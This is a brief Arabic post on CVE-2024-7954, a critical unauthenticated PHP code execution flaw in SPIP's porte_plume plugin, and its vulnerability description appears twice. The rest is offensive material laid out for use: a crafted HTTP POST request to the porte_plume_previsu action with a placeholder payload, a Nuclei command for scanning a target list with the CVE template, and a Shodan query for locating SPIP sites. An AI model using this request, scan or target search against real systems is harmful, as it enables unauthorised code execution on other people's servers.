
المكون الإضافي porte_plume المستخدم في SPIP قبل الإصدارات 4.30-alpha2 و4.2.13 و4.1.16 معرض لثغرة تنفيذ تعليمات برمجية عشوائية. يمكن لمهاجم عن بعد وغير مصادق تنفيذ كود PHP عشوائي كمستخدم SPIP عن طريق إرسال طلب HTTP مصمم خصيصًا. (حرج)
إضافة porte_plume المستخدمة في SPIP قبل الإصدارات 4.30-alpha2 و4.2.13 و4.1.16 معرضة لثغرة تنفيذ تعليمات برمجية تعسفية. يمكن لمهاجم عن بُعد وغير موثوق به تنفيذ PHP تعسفي كمستخدم SPIP عن طريق إرسال طلب HTTP مُصمم خصيصًا. (حرج)
استغلال:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL]_BB
الأداة المستخدمة:
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml
استعلام Shodan:
app="SPIP"